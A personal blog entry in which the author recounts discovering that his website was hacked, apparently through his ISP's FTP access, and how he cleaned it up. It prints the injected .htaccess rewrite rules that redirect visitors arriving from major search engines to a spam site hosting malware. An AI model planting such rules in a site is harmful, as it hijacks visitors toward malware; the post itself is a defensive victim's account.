this website hacked
the journal of Michael Werneburg
twenty-seven years and one million words
Today I learned from a friend that my website has been altered by someone redirecting search engine traffic to a spam website.
Not good news for someone who's spent fifteen years in the IT industry, and a good part of that tinkering with web servers and the code therein. Much shame upon me.
And upon my ISP, I have to say. Until proven otherwise, I'm now suspicious of their password management system, the security of the FTP server used in placing a bad file on my website, and their inability to proactively detect this sort of thing.
Here's what happened. First, I'd noticed over the past few months that using Google at the office to dig up a page on my website always led to a spam website that hosts "malware" (software of bad intent). I was unable to reproduce the issue from home. I put this down to the sometimes haywire proxy server at the office, which I've seen behaving badly in other ways.
Then a friend told me that the problem was persisting both at home and from his office. He did a bit of looking around on the 'net and discovered the symptoms he was seeing were the result of a modification made to various other websites. In fact, details on the issue and steps towards fixing it were posted about it by these fine people.
The root of the problem was that the .htaccess file (which controls access to the website) had been altered. Instead of being a blank or very simple file, it had the following content. I apologize for the crude nature of content; you may want to ensure that any children leave the brower's vicinity.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]^M
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://vemo.info/0/go.php?sid=1 [R,L]
Naturally I replaced this with an empty file immediately and set the permissions to world-readable, world-unwritable. I then queried my ISP on how this had happened. I await their response with some misgivings. I'm still digging around to see if anything else was modified.